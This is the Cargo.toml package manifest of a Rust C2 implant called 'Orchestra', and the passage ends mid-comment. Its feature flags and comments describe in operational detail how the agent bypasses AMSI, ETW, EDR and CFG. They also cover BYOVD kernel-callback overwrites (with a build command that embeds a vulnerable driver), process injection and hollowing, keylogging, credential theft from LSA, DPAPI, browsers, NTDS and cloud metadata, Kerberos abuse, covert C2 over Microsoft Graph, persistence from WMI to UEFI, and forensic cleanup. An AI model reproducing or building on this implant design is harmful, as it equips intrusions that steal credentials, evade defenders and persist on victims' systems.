[package]
name = "agent"
description = "Orchestra implant — multi-transport C2 agent with sleep obfuscation, injection engine, and plugin support"
version.workspace = true
edition.workspace = true
license.workspace = true

[dependencies]
chacha20 = "0.9"
bincode = { version = "2", features = ["serde"] }
base32 = "0.4.0"
sha2 = { workspace = true }
subtle = { version = "2", default-features = false }
hmac = "0.13"
hex = "0.4"
reqwest = { version = "0.12", default-features = false, features = ["rustls-tls", "json", "blocking"] }
junk_macro = { path = "../junk_macro" }
pe_resolve = { path = "../pe_resolve" }
string_crypt = { path = "../string_crypt" }
common = { path = "../common" }
uefi-persistence = { path = "../uefi-persistence", optional = true }
tokio = { workspace = true }
tracing = { workspace = true }
tracing-subscriber = { workspace = true }
sysinfo = { workspace = true }
anyhow = { workspace = true }
# portable-pty: cross-platform PTY interface used by the interactive shell.
# NOTE: 0.9 is the latest release.  If maintenance stalls, consider migrating
# to `xpty` (async fork of portable-pty) or `wezterm-pty`.  The API surface
# used is: NativePtySystem, CommandBuilder, PtySize, ChildKiller, MasterRead.
portable-pty = "0.9"
dirs = "5.0"
uuid = { version = "1.0", features = ["v4"] }
base64 = { workspace = true }
urlencoding = { workspace = true }
serde_json = { workspace = true }
serde = { workspace = true }
module_loader = { path = "../module_loader" }
optimizer = { path = "../optimizer" }
code_transform = { path = "../code_transform", optional = true }
goblin = { version = "0.8", default-features = false, features = ["elf64", "elf32", "endian_fd"], optional = true }
toml = { workspace = true }
# rustls 0.23 is used for TLS (outbound, SSH transport, reqwest 0.12, etc.)
rustls = { workspace = true }
tokio-rustls = { workspace = true }
rustls-pemfile = "2.2.0"
rustls-native-certs = "0.8"
rcgen = { version = "0.14.7", default-features = false, features = ["crypto", "ring", "pem"] }
sha1 = "0.11"
md-5 = "0.10"
digest = "0.11"
getrandom = "0.2"
rand = "0.8"
url = "2"
thiserror = { workspace = true }
libc = "0.2.185"
once_cell = "1.21.4"
zeroize = { version = "1.8.2", features = ["zeroize_derive"] }
chacha20poly1305 = "0.10"
x25519-dalek = { version = "2", features = ["static_secrets"] }
hkdf = { version = "0.13" }
ed25519-dalek = { version = "2", features = ["rand_core"] }
# RSA key handling + RS256 JWT signing for Entra ID Pass-the-Certificate.
# ring is already pulled in transitively by rustls and rcgen; listing it as a
# direct dependency allows the entra-ptc feature to use ring::signature::RsaKeyPair
# for JWT RS256 signing without introducing a new crypto crate.
ring = { version = "0.17", optional = true }
aes-gcm = "0.10"
aes = "0.9.0"
async-trait = "0.1.89"
# windows-sys: Microsoft's official Win32 API bindings (replaces unmaintained winapi).
# Compiles on all platforms — generates empty stubs on non-Windows.
# All `use windows_sys::` imports in cross-platform modules are inside
# `#[cfg(windows)]` blocks, so no FFI linking occurs on non-Windows targets.
windows-sys = { version = "0.59", features = [
    "Win32_Foundation",
    "Win32_Graphics_Gdi",
    "Win32_NetworkManagement_WNet",
    "Win32_Security",
    "Win32_Security_Cryptography",
    "Win32_System_Com",
    "Win32_System_Variant",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Kernel",
    "Win32_System_Memory",
    "Win32_System_Registry",
    "Win32_System_Rpc",
    "Win32_System_SystemInformation",
    "Win32_System_SystemServices",
    "Win32_System_Threading",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_LibraryLoader",
    "Win32_System_Pipes",
    "Win32_System_ProcessStatus",
    "Win32_System_Wmi",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Security_Authentication_Identity",
    "Win32_Storage_FileSystem",
    "Win32_System_WindowsProgramming",
] }
# SSH transport via russh.  0.60.2 is the latest stable release but depends on
# pre-release RustCrypto crates (aead 0.6.0-rc, aes-gcm 0.11.0-rc,
# curve25519-dalek 5.0.0-pre, ed25519-dalek 3.0.0-pre, pkcs8 0.11.0-rc,
# spki 0.8.0-rc, and stable-but-duplicate sha2/hkdf/hmac/pbkdf2 0.13).
# This creates ~16 duplicate crate versions in Cargo.lock, gated behind the
# `ssh-transport` feature.  Cannot be patched away — russh requires the newer
# API surface.  Revisit when russh releases a version built on stable RustCrypto.
russh = { version = "0.60.2", optional = true, default-features = false, features = ["flate2", "ring"] }
quinn = { version = "0.11", optional = true }
notify = { version = "6.1", optional = true }

[target.'cfg(all(target_os = "linux", not(target_os = "android")))'.dependencies]
enigo = { version = "0.2", optional = true, default-features = false, features = ["x11rb"] }
image = { version = "0.25", optional = true, default-features = false, features = ["png"] }
x11rb = { version = "0.13", optional = true, features = ["image"] }
zbus = { version = "4", optional = true, default-features = false, features = ["tokio"] }
futures-util = { version = "0.3", optional = true, default-features = false }

[target.'cfg(target_os = "android")'.dependencies]
jni = { version = "0.21", features = ["invocation"], optional = true }
android_logger = { version = "0.14", optional = true }
log = { version = "0.4", optional = true }

[target.'cfg(target_os = "macos")'.dependencies]
enigo = { version = "0.2", optional = true }
image = { version = "0.25", optional = true, default-features = false, features = ["png"] }

[target.'cfg(windows)'.dependencies]
enigo = { version = "0.2", optional = true }
winreg = "0.52"
image = { version = "0.25", optional = true, default-features = false, features = ["png"] }
hollowing = { path = "../hollowing" }
nt_syscall = { path = "../nt_syscall" }

[features]
default = ["manual-map"]
p2p-tcp = []
ppid-spoofing = []
stealth = ["direct-syscalls", "unsafe-runtime-rewrite", "memory-guard", "ppid-spoofing"]
dev = []
hot-reload = ["notify"]
env-validation = []
persistence = []
network-discovery = []
# Linux screenshot support uses x11rb for X11, xdg-desktop-portal over D-Bus for
# Wayland, and /dev/fb0 as a headless fallback.  x11rb is pure Rust, so the
# remote-assist feature cross-compiles for Linux ARM64 without target pkg-config
# or an X11 sysroot.
remote-assist = ["dep:enigo", "dep:image", "dep:x11rb", "dep:zbus", "dep:futures-util"]
module-signatures = ["common/module-signatures"]
# Strict runtime key policy for module verification: when enabled alongside
# module-signatures, the module loader hard-errors at runtime if no explicit
# verification key is provided (instead of falling back to the compile-time
# MODULE_SIGNING_PUBKEY constant).  Passthrough to module_loader.
strict-module-key = ["module_loader/strict-module-key", "module-signatures"]
direct-syscalls = []
# Pre-injection ETW auto-logger enumeration via registry (NtOpenKey /
# NtEnumerateKey / NtQueryValueKey).  When disabled, check_etw_trace()
# returns EtwStatus::Unknown immediately with no registry access.
etw-check = []
# Spoof the user-mode call stack visible to EDR kernel callbacks during
# indirect syscall dispatch.  Before jumping to the ntdll syscall gadget
# a two-entry fake frame chain is pushed onto the stack so that stack walkers
# see ntdll!NtQuerySystemTime as the immediate caller rather than agent code.
# Requires (and implies) the `direct-syscalls` feature; only active on
# Windows x86-64.
stack-spoof = ["direct-syscalls"]
manual-map = ["module_loader/manual-map"]
traffic-normalization = []
perf-optimize = ["optimizer/diversification"]
# Injection technique features.
# These gate individual injection techniques at compile time via #[cfg(feature)].
# When disabled, the technique's enum variant, dispatch path, implementation
# functions, and all sub-variants are excluded from the binary, reducing code
# surface.  Requires (and implies) `direct-syscalls` for indirect syscall stubs.
module-stomp = ["direct-syscalls"]
thread-hijack = ["direct-syscalls"]
threadpool-inject = ["direct-syscalls"]
fiber-inject = ["direct-syscalls"]
context-only = ["direct-syscalls"]
section-map = ["direct-syscalls"]
callback-inject = ["direct-syscalls"]
# Capture human-computer-interaction telemetry (key/mouse events, timing).
# On Linux this uses rdev's default X11/libinput backend.  Compile with the
# companion `evdev` feature to switch to the kernel evdev-rs backend instead;
# evdev avoids X11 but requires libtool + a full autotools chain at build time
# (autoconf, automake, libtool must be installed; see README.md §Build Dependencies).
hci-research = ["dep:chrono", "dep:twox-hash"]
# (evdev feature removed — rdev was replaced with custom evdev listener in V4-2-04)
# Connect the agent outbound to an Orchestra Control Center instead of waiting
# for an inbound connection from a console. The server address and PSK are
# baked in at compile time via the ORCHESTRA_C_ADDR / ORCHESTRA_C_SECRET build
# env vars (set automatically by the Builder when outbound-c is included in a
# profile). Debug builds may override them with ORCHESTRA_C / ORCHESTRA_SECRET.
outbound-c = []
# NOTE: Application-layer forward secrecy (X25519 ECDH + HKDF) is now
# always enabled.  The `common::forward_secrecy` module is compiled
# unconditionally and available in all builds.  The old feature flag has
# been removed because it was a no-op stub that gated nothing.
unsafe-runtime-rewrite = ["optimizer/unsafe-runtime-rewrite"]
# Encrypt all designated sensitive memory regions while the agent is idle.
# Uses XChaCha20-Poly1305.  The 32-byte key is held in CPU registers (x86-64
# XMM lanes via inline asm) for the duration of the idle window so that a
# memory dump taken while the agent is sleeping reveals only ciphertext.
memory-guard = []
# Activate the DNS-over-HTTPS covert transport (c2_doh::DohTransport).
# When enabled and dns_over_https=true is set in agent.toml, the agent
# tunnels C2 traffic through DNS TXT queries sent to a DoH resolver.
# The server-side DoH listener is provided by orchestra-server
# (see doh_listener module). Enable doh_enabled=true in the server
# configuration to activate it.
doh-transport = []
# Activate the HTTP malleable-profile transport (c2_http::HttpTransport).
# When enabled and cdn_relay=true is set in agent.toml, the agent tunnels
# C2 traffic over HTTP/S using the malleable profile headers/URIs.
http-transport = []
# Browser stored-data recovery: Chrome (including App-Bound Encryption v127+),
# Edge, and Firefox.  Windows-only.  No extra crate dependencies beyond what is
# already in the agent dependency tree.
browser-data = []
# LSA Whisperer — credential extraction via LSA SSP interfaces.
# Interacts with LSA authentication packages through documented interfaces,
# operating within the LSA process's own security context.  Bypasses Credential
# Guard and RunAsPPL.  Windows-only.  No extra crate dependencies.
lsa-whisperer = ["outbound-c"]# Surveillance capabilities: screenshot capture (multi-monitor), keylogger
# (WH_KEYBOARD_LL with encrypted buffer), and clipboard monitoring (polling
# thread with encrypted buffer).  Pulls in `dep:image` for PNG encoding.
surveillance = ["dep:image"]# Activate the SSH covert transport (c2_ssh::SshTransport).
# When enabled and ssh_host is set in agent.toml, the agent tunnels C2
# traffic through an SSH session channel.  Add russh and russh-keys to the
# dependency set; requires no native OpenSSL library — all crypto is
# pure-Rust.
ssh-transport = ["dep:russh"]
# Activate the SMB/TCP named-pipe covert transport (c2_smb::SmbPipeTransport).
# When enabled and smb_pipe_enabled=true is set in agent.toml, the agent
# tunnels C2 traffic through a Windows named pipe.  Two modes are supported:
# "smb" (direct named-pipe connection via NT syscalls, Windows-only) and
# "tcp_relay" (connects to a local TCP relay that bridges to the pipe).
# The server-side SMB relay is provided by orchestra-server
# (see smb_relay module).
smb-pipe-transport = []
# Activate the Microsoft Graph API covert C2 transport
# (c2_graph::GraphTransport).  Tunnels C2 traffic through Microsoft Graph
# API endpoints (Outlook drafts, OneDrive files, Teams messages, or
# SharePoint lists).  Traffic to graph.microsoft.com is indistinguishable
# from legitimate Office 365 / M365 traffic, making it essentially
# impossible to block in enterprise environments.  Uses reqwest, serde,
# base64, rand, and tokio — all already in the dependency tree.
graph-transport = []
# Activate the QUIC (HTTP/3) covert C2 transport (c2_quic::QuicTransport).
# Tunnels C2 traffic over QUIC streams with TLS 1.3. Provides UDP-based
# transport with head-of-line blocking elimination, connection migration,
# and NAT traversal.  HTTP/3 compatibility mode available for traffic
# blending.  Uses quinn (pure-Rust QUIC), rustls, and tokio — minimal
# additional binary size impact since rustls is already in the dep tree.
quic-transport = ["dep:quinn"]
# Use hardware-breakpoint (DR0/DR1 + VEH) AMSI/ETW bypass instead of the
# default memory-patch approach.  The HWBP strategy is stealthier (no .text
# modification) but is only needed when memory-patching is blocked by CFG or
# similar mitigations.  Default (without this feature) is the memory-patch
# approach from amsi_defense.rs, which leaves no environment-variable trace.
hwbp-amsi = []
# General-purpose hardware-breakpoint hooking framework using x86_64 debug
# registers (Dr0–Dr3) and a VEH handler.  Provides invisible hooks that do
# not modify any bytes in the target function — completely immune to code-
# integrity checks.  Manages up to 4 simultaneous breakpoints with per-slot
# callback dispatch.  Includes integrations for ETW suppression and AMSI
# bypass via hardware breakpoints (replacing the simpler Dr0/Dr1 approach
# in evasion.rs).  Falls back to inline patching when all debug registers
# are occupied.  Windows x86_64 only.
hw-bp-hook = ["direct-syscalls"]
# AMSI Write-Raid bypass: spawns a race thread that continuously overwrites the
# AmsiInitFailed flag in amsi.dll's .data section, causing all subsequent
# AmsiScanBuffer calls to return AMSI_RESULT_CLEAN without code patching.
# Zero VirtualProtect calls, zero .text modifications, zero hardware
# breakpoints.  Most stealthy AMSI bypass available.
write-raid-amsi = []
# Continuous memory hiding ("Evanesco"): keeps all pages NOT actively being
# executed in an encrypted/PAGE_NOACCESS state at ALL times, not just during
# sleep.  Per-page RC4 encryption with a background re-encryption thread,
# VEH-based auto-decryption, and RAII PageGuard for JIT access.  Works as an
# additional layer alongside the existing XChaCha20-Poly1305 sleep encryption.
# Windows-only (uses NtProtectVirtualMemory, VEH).
evanesco = []
# Memory Encryption with Thread Context: encrypts thread register states
# (CONTEXT structs), stack pointers, and TLS data during sleep obfuscation.
# Suspends all non-current threads, captures and XChaCha20-Poly1305-encrypts
# their CONTEXT structs, then restores on wake.  Prevents forensic tools from
# recovering execution state from suspended thread registers.  Derives a
# domain-separated key from the sleep-encryption key via HKDF.  Windows-only,
# gated behind `thread-ctx-encrypt`.  Works alongside the existing sleep
# obfuscation system as an additional layer.
thread-ctx-encrypt = []
# Kernel callback overwrite (BYOVD): surgically overwrite EDR kernel callback
# function pointers to point to a `ret` instruction instead of NULLing them.
# Defeats EDR self-integrity checks (CrowdStrike, Defender) that verify their
# callbacks are still registered by checking if the pointer is non-NULL.
# A ret pointer passes these checks (non-NULL, valid executable memory) but
# causes the callback to immediately return without executing any monitoring
# logic.  Requires (and implies) `direct-syscalls`.  Windows-only.
kernel-callback = ["direct-syscalls"]
# Embed XOR-encrypted vulnerable driver bytes at compile time.  When enabled,
# the ORCHESTRA_DRIVER_PATH (or SYS_DRIVER_PATH) environment variable MUST be
# set to the path of the encrypted driver file.  If not set, compilation fails
# with a clear error.  Set EMBEDDED_DRIVER_ALLOW_MISSING=1 or CI=1 to compile
# a no-op stub instead (for `--all-features` CI builds).
# Example:
#   ORCHESTRA_DRIVER_PATH=resources/drivers/dbutil_2_3_xor_encrypted.bin \
#       cargo build --features embedded_driver
embedded_driver = []
# Self-re-encoding ("Metamorphic Lite"): periodically re-encode the agent's own
# .text section at runtime using the code_transform pipeline with a fresh seed
# derived from a C2-supplied nonce and the current timestamp.
self-reencode = ["dep:code_transform", "dep:goblin"]
# Automated EDR bypass transformation engine: scans the agent's own .text
# section for byte signatures known to be detected by EDR (YARA rules, entropy
# heuristics, known gadget chains like "4C 8B D1 B8" for direct syscall stubs).
# When a detected pattern is found, applies semantic-preserving transformations
# automatically at runtime: instruction substitution, register reassignment,
# nop sled insertion with semantic-equivalent nops, constant splitting, and
# jump obfuscation.  Supplements self-reencoding (handles PATTERN AVOIDANCE
# before and after morphing).  Requires (and implies) `self-reencode`.
evasion-transform = ["self-reencode"]
# NTFS transaction-based process hollowing: creates an NTFS transaction via
# NtCreateTransaction, creates a section backed by the transaction, writes
# payload into a suspended target process, then rolls back the transaction
# so the file on disk never existed.  The section mapping in the target
# process remains valid.  Includes ETW blinding with spoofed provider GUIDs.
# Falls back to RtlCreateTransaction via kernel32 ordinal if NtCreateTransaction
# SSN is unavailable.  Requires (and implies) `direct-syscalls`.  Windows-only.
transacted-hollowing = ["direct-syscalls"]

# Delayed module-stomp injection: loads a sacrificial DLL into the target
# process, waits for a configurable delay (default 8–15 seconds randomized)
# to let EDR initial-scan heuristics pass, then overwrites the DLL's .text
# section with the payload.  Defeats timing-based EDR heuristics that flag
# modules whose code changes shortly after loading.  Two-phase: Phase 1 loads
# the DLL and returns immediately; Phase 2 stomps and executes after delay.
# Requires (and implies) `direct-syscalls`.  Windows-only.
delayed-stomp = ["direct-syscalls"]

# Phantom DLL hollowing: maps a DLL via NtCreateSection + NtMapViewOfSection
# (never written to disk), creates a suspended host process (e.g. svchost.exe),
# unmaps the host image, maps the phantom section into the host process,
# fixes relocations + IAT, updates PEB ImageBaseAddress, and resumes. The
# resulting process appears legitimate (host binary backed on disk) but
# executes the phantom DLL's code. Uses exclusively section-based memory
# management — no VirtualAlloc/VirtualAllocEx. Ranked above standard
# ProcessHollow in auto-selection. Requires (and implies) `direct-syscalls`.
# Windows x86_64 only.
phantom-dll-hollow = ["direct-syscalls"]

# User-mode NT kernel interface emulation: routes configured Nt* syscalls
# through kernel32/advapi32 equivalents instead of ntdll syscall stubs.
# Makes the agent invisible to EDR hooks on ntdll AND to ntdll unhooking
# detection.  Call stacks show kernel32!WriteProcessMemory etc. — looks
# like legitimate API usage.  Falls back to existing indirect syscall path
# when kernel32 equivalent fails.  Requires (and implies) `direct-syscalls`.
# Windows-only.
syscall-emulation = ["direct-syscalls"]

# SEH-based anti-debugging: constructs deeply nested VEH handler chains that
# cause analysis tools, debuggers, and emulators to mis-execute or crash when
# attempting to trace execution.  NOT traditional anti-debugging — operates
# through the Windows exception dispatch mechanism itself.  Six strategies:
# trap flag, CloseHandle, int 0x2D, icebp, lock-prefix null deref, and
# instrumentation callback query.  Includes SEH-based code obfuscation,
# anti-trace detection, and chain integrity verification.  Windows-only.
seh-anti-debug = []

# CET (Control-flow Enforcement Technology) / Shadow Stack bypass: handles
# Windows 11 24H2+ hardware-enforced shadow stacks that defeat return-address
# spoofing and stack pivoting.  Three strategies: (1) disable CET via process
# mitigation policy, (2) CET-compatible call chain building, (3) VEH-based
# shadow stack fix (experimental, requires kernel access).  Integrates with
# the existing stack-spoofing code in syscalls.rs by adding a CET-awareness
# check at the entry point.  Requires (and implies) `direct-syscalls`.
# Windows-only.
cet-bypass = ["direct-syscalls"]

# ARM64 BTI (Branch Target Identification) and PAC (Pointer Authentication
# Code) bypass: ARM64 equivalents of the Intel CET bypass.  PAC signs
# return addresses and function pointers with cryptographic keys stored in
# system registers — it is significantly harder to bypass than CET (which
# only maintains a shadow stack).  Strategies: (1) PAC-valid trampoline
# routing through system DLLs, (2) PAC key extraction via BYOVD (requires
# kernel-callback feature + a loaded vulnerable driver), (3) PAC strip and
# re-sign.  BTI bypass uses gadget scanning for BTI-validated indirect
# branch targets (BTI instruction encodings).  Integrates with clean_call!
# for ARM64 Windows.  Requires (and implies) `direct-syscalls`.
# Windows ARM64 only.
pac-bypass = ["direct-syscalls"]

# Token-only impersonation via NtImpersonateThread / SetThreadToken:
# bypasses ImpersonateNamedPipeClient detection by extracting the
# impersonation token through a helper thread and applying it to the
# main thread via NtSetInformationThread(ThreadImpersonationToken).
# Alternative strategy uses DuplicateTokenEx + SetThreadToken directly.
# Includes encrypted token cache, auto-revert on task completion, and
# integration with lsass_harvest and P2P SMB pipe connections.
# Requires (and implies) `direct-syscalls`.  Windows-only.
token-impersonation = ["direct-syscalls"]

# Local Privilege Escalation: automated SYSTEM token acquisition via token
# theft, named pipe impersonation, and Print Spooler exploitation.
# Tries multiple techniques in order, returns first success.
# Windows-only.  Gated by `lpe` feature flag (implies `direct-syscalls`).
lpe = ["direct-syscalls"]

# Container escape, cloud metadata credential theft, and cloud IAM lateral
# movement.  Detects Docker/Podman/Kubernetes/LXC environments, attempts
# cgroup release_notification, device mount, and mount propagation escapes.
# Queries AWS IMDS (v1+v2), Azure IMDS, GCP IMDS for temporary credentials.
# Uses stolen credentials to enumerate AWS (S3, EC2, IAM) and Azure
# (subscriptions, Key Vaults, Storage, VMs) resources via SigV4 and ARM REST.
# Also reads K8s service account tokens and enumerates pods.
# Linux-only.  Gated by `container-escape` feature flag (implies `direct-syscalls`).
container-escape = ["direct-syscalls"]

# Forensic cleanup — Windows Prefetch evidence removal: cleans .pf files
# after injection or on-demand to prevent forensic timeline analysis.
# Three methods: (1) delete via NtDeleteFile, (2) patch header in-place
# via NtCreateSection + NtMapViewOfSection (preferred — file remains but
# contains no useful forensic data), (3) disable Prefetch service via
# registry.  Also cleans USN journal entries referencing the .pf file.
# Hooks into injection_engine post-injection for automatic cleanup.
# Requires (and implies) `direct-syscalls`.  Windows-only.
forensic-cleanup = ["direct-syscalls"]
# Automated internal reconnaissance and target profiling: Active Directory
# enumeration (LDAP), automated attack path discovery (graph-based BFS),
# cloud environment fingerprinting (registry + IMDS), and credential
# attack automation (Kerberoasting, AS-REP Roasting, password spraying).
# All API resolution via pe_resolve (wldap32, netapi32, advapi32, secur32).
# Windows-only.
recon = []
# Kerberos relay attack via COM cross-session activation: captures Kerberos
# service tickets without NTLM by triggering COM activation (CoCreateInstanceEx
# with custom COSERVERINFO) against an attacker-controlled RPC listener.
# Parses the AP-REQ from the RPC bind security trailer using a minimal
# ASN.1/DER decoder.  Known exploitable CLSIDs (BITS, ICertPassage,
# TaskService, UpdateOrchestrator) are hardcoded.  API resolution via
# pe_resolve (ole32.dll) — no IAT entries.  Requires SeImpersonatePrivilege
# for COM activation.  Windows-only.
kerberos-relay = []
# DPAPI domain backup key retrieval and secret decryption via MS-BKRP
# (BackupKey Remote Protocol).  Retrieves the domain backup key from a DC
# using RPC over named pipe (\pipe\lsarpc), then decrypts DPAPI blobs
# (Credential Store, Chrome, WiFi, RDP) without touching LSASS.  Any
# domain-authenticated user can retrieve the backup key — no Domain Admin
# required.  Uses CryptoAPI for RSA decryption and manual AES-256-CBC.
# API resolution via pe_resolve — no IAT entries.  Windows-only.
dpapi-backup = []
shadow-credentials = []
# S4U2Self / S4U2Proxy Kerberos delegation abuse: discovers accounts with
# constrained delegation (msDS-AllowedToDelegateTo) or protocol transition
# (TRUSTED_TO_AUTH_FOR_DELEGATION), then forges service tickets for arbitrary
# users by issuing S4U2Self (PA-FOR-USER) followed by S4U2Proxy TGS requests
# to the KDC.  Applies the forged ticket to the current logon session via
# LsaCallAuthenticationPackage (KERB_SUBMIT_TKT).  Reuses LDAP infrastructure
# from shadow_credentials (wldap32.dll via pe_resolve) for delegation discovery
# and manual DER encoding for TGS-REQ/PA-FOR-USER construction.  KDC
# communication over TCP port 88 with 4-byte big-endian length framing.
# No IAT entries — all API resolution via pe_resolve hash-based resolution.
# Windows-only, gated by `s4u-abuse` feature flag.
s4u-abuse = []
# COM Scriptlet (.sct) execution via xwizard.exe and alternative LOLBIN
# dispatchers (odbcconf.exe, pcwrun.exe, forfiles.exe).  Generates COM
# scriptlet XML with inline JScript/VBScript that hosts shellcode via
# COM object instantiation (Scripting.FileSystemObject → ADODB.Stream →
# shellcode exec).  xwizard.exe is signed by Microsoft and not commonly
# monitored by EDR, making it a stealthy scriptlet host.  Supports disk-
# based execution (TEMP directory .sct files) and memory-mapped execution
# (NtCreateSection).  Includes LolbinDispatcher for fallback LOLBINs when
# xwizard.exe is unavailable or blocked by AppLocker.  No powershell.exe,
# cmd.exe, wscript.exe, or mshta.exe involved.  All API resolution via
# pe_resolve — no IAT entries.  Windows-only, gated by `lolbin-xwizard`
# feature flag.
lolbin-xwizard = []
# WSL2 as an evasion layer: uses the Windows Subsystem for Linux v2 to
# execute ELF binaries, run Linux-native tools (curl, socat, ncat), and
# relay C2 traffic through the WSL2 VM — completely outside the Windows
# security product surface.  Detection probes for wsl.exe availability,
# LxssManager service state, and registered distros.  Execution strategies
# include: (1) writing ELF to Windows TEMP, accessing via /mnt/c/ from WSL,
# (2) piping ELF bytes directly to memfd_create within WSL via stdin.
# Networking via WSL2 (curl, socat, ncat) evades Windows-level network
# monitoring.  File access via /mnt/c/ bridges Windows and WSL2 filesystems.
# Injection into WSL2 processes via ptrace (Linux-native, invisible to
# Windows EDR).  No Admin required — graceful degradation when WSL2 is
# unavailable.  All API resolution via pe_resolve — no IAT entries.
# Windows-only, gated by `wsl2-evasion` feature flag.
wsl2-evasion = []
# Registry-free COM object hijacking via SxS manifest activation contexts.
# Redirects COM CLSID resolution to a proxy DLL without touching the Windows
# registry.  Uses activation contexts (CreateActCtxW / ActivateActCtx /
# DeactivateActCtx / ReleaseActCtx) resolved by hash from kernel32.dll.
# Includes TargetSelector for identifying hijackable COM objects and a proxy
# DLL PE generator.  No IAT entries — all API resolution via pe_resolve.
# Windows-only.
com-hijack = []

# VSS (Volume Shadow Copy) pivoting: reads locked files (SAM, SYSTEM,
# NTDS.dit) through VSS snapshot filesystem paths instead of direct access.
# Bypasses file-access telemetry because EDR monitors direct opens but not
# \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy paths.  Includes:
# shadow copy discovery (WMI + vssadmin), VSS file reader (NtCreateFile +
# NtReadFile via syscall!), SAM/NTDS credential harvesting (in-memory parsing
# of registry hives and ESE databases), and selective cleanup (only deletes
# agent-created snapshots).  Windows-only, gated by `vss-pivot` feature flag.
vss-pivot = []

# WMI permanent event subscriptions with encrypted cloud payloads.
# Office add-in persistence via OneDrive sync: deploys macro-enabled
# Excel (.xlam) or Word (.dotm) add-ins to OneDrive-synced XLSTART /
# STARTUP folders.  The add-in file is automatically replicated to every
# device the user signs into, providing fleet-wide persistence through
# Microsoft's own sync infrastructure with zero per-machine deployment.
# OneDrive path discovery (registry + env + filesystem probe), Office
# Open XML + OLE2/CFB vbaProject.bin generation with VBA obfuscation,
# NtCreateFile/NtWriteFile for write, registry-based AccessVBOM check,
# and OneDrive-sync-aware cleanup (deletion syncs across all devices).
# No Administrator privileges required.  Windows-only.
office-addin = []
# Installs WMI persistence triad via COM-based WMI operations.
# Payloads encrypted with XChaCha20-Poly1305 and hosted on cloud
# storage (Azure Blob, AWS S3, GitHub Gist).  The WMI subscription
# objects contain no shellcode — only a stager command that fetches
# and decrypts the payload at execution time.  Windows-only.
wmi-persistence = []
# UEFI firmware-level persistence: NVRAM manipulation, ESP driver deployment,
# EFI PE/COFF stub building, runtime DXE driver support, capsule delivery,
# and detection/cleanup of firmware implants.  Cross-platform crate (Linux
# uses /sys/firmware/efi/efivars, Windows uses GetFirmwareEnvironmentVariableW).
# Gated by `uefi-persistence` feature flag.
uefi-persistence = ["dep:uefi-persistence"]
# Hardware-level persistence and attack capabilities: Thunderbolt/DMA
# attack infrastructure (controller detection, vulnerability assessment,
# DMA payload generation, physical memory read), boot-sector/VBR
# persistence (BIOS and UEFI), and boot-level artifact detection/removal.
# Cross-platform (Linux reads /sys/bus/thunderbolt and /sys/firmware/efi;
# Windows uses SetupAPI, registry, and raw disk I/O).  All disk writes are
# backed up and verified by read-back.  Physical-access techniques are
# documented as requiring operator presence at the target.
# Gated by `hardware-persistence` feature flag.
hardware-persistence = []
# eBPF-based Linux evasion: hides the agent's process, files, and network
# connections from user-space monitoring tools by loading eBPF programs that
# intercept getdents64, openat, and read syscalls. Requires root or
# CAP_BPF/CAP_SYS_ADMIN at runtime. Gracefully degrades if unprivileged.
# Build-time requires `clang` for eBPF C→BPF compilation (skipped if absent).
# Linux-only (x86_64 and aarch64). Kernel >= 4.15 for tracepoints,
# >= 5.2 recommended for better BPF features.
ebpf = ["direct-syscalls"]

# Trampoline-based stack spoofing: builds multi-frame synthetic call stacks
# using trampolines through legitimate modules (clean-mapped DLLs).  Extends
# the single-frame spoof_call approach by chaining through 3–6 intermediate
# gadgets in different system DLLs, producing a call stack that appears as
# normal application worker threads to EDR stack-walking tools.  Uses a
# separate allocated fake stack (NtAllocateVirtualMemory, PAGE_READWRITE)
# with plausible return addresses, frame pointers, shadow space, and local
# variable patterns.  Falls back to spoof_call when trampolines are
# unavailable.  Integrates with clean_call! via the trampoline_spoof! macro.
# Requires (and implies) `direct-syscalls`.  Windows x86_64 only.
trampoline-spoof = ["direct-syscalls"]

# Control Flow Guard (CFG) bypass: three strategies to bypass Microsoft's
# CFG implementation which validates indirect call targets against a kernel-
# maintained bitset of valid targets.  Strategy 1 manipulates the CFG bitset
# directly (promotes agent/shellcode addresses as valid targets).  Strategy 2
# routes execution through CFG-valid trampolines found in system DLLs.
# Strategy 3 overrides the CFG dispatch function pointer to always return
# TRUE.  Integrates with spoof_call and clean_call! to promote target
# addresses before indirect calls.  Requires (and implies) `direct-syscalls`.
# Windows x86_64 only.
cfg-bypass = ["direct-syscalls"]

# Adaptive C2 timing: learns the target network's traffic patterns and adjusts
# callback timing to blend in.  Replaces simple fixed-percentage jitter with
# Gaussian-distributed timing modelled on observed inter-arrival times.
# Three phases: Learning (first N observations), Active (schedule callbacks
# during peak traffic for cover), and Evasion (increase interval, avoid quiet
# hours).  Gracefully degrades to standard jitter when insufficient data.
# Cross-platform (no external ML dependencies).  Gated by `adaptive-timing`
# feature flag.
adaptive-timing = []

# Reflective DLL loading via NtCreateSection + NtMapViewOfSection.
# Loads PE DLLs into the current or a remote process without calling
# VirtualAlloc/VirtualAllocEx at all — uses lower-level NT section
# primitives that bypass the Win32 API layer entirely.  Handles PE32
# and PE32+ (64-bit) images, relocation fixups, IAT rebuilding,
# per-section memory protections, and header cleanup.  Remote variant
# maps a shared section into both agent and target process.  Requires
# (and implies) `direct-syscalls`.  Windows x86_64 only.
reflective-loader = ["direct-syscalls"]

# Page fault driven execution: keeps payload pages encrypted with
# XChaCha20-Poly1305 under PAGE_NOACCESS.  A VEH handler intercepts
# STATUS_ACCESS_VIOLATION faults, decrypts the faulting page, sets
# PAGE_EXECUTE_READ, and resumes execution.  A periodic NtCreateTimer/
# NtSetTimer APC re-encrypts pages that haven't been accessed recently,
# minimizing the window in which decrypted code resides in memory.
# Includes anomaly detection (excessive faults = scanning/emulation).
# Windows x86_64 only.
page-fault-exec = []

# Counterfeit Object-Oriented Programming (COOP): an evolution of ROP that
# chains calls through C++ virtual function dispatch rather than raw gadgets.
# Because COOP chains go through legitimate vtable pointers, CFI/CFG
# implementations see only valid indirect call targets.  Scans system DLLs
# (ntdll, kernel32, etc.) for vtables, classifies virtual functions by
# behavior (StoreArg0, LoadArg0, CallArg0, Arithmetic, NoOp), constructs
# counterfeit objects with real vtable pointers, and chains operations via
# virtual dispatch.  No executable memory allocated — only data (PAGE_READWRITE).
# Windows x86_64 only.
coop = []

# Entra ID Pass-the-Certificate: authenticates to Microsoft Entra ID (Azure AD)
# using a stolen or forged X.509 certificate + private key instead of a
# password or secret.  Implements the OAuth2 client-credentials flow with
# RS256 JWT assertion signed by the certificate's RSA key.  Supports both
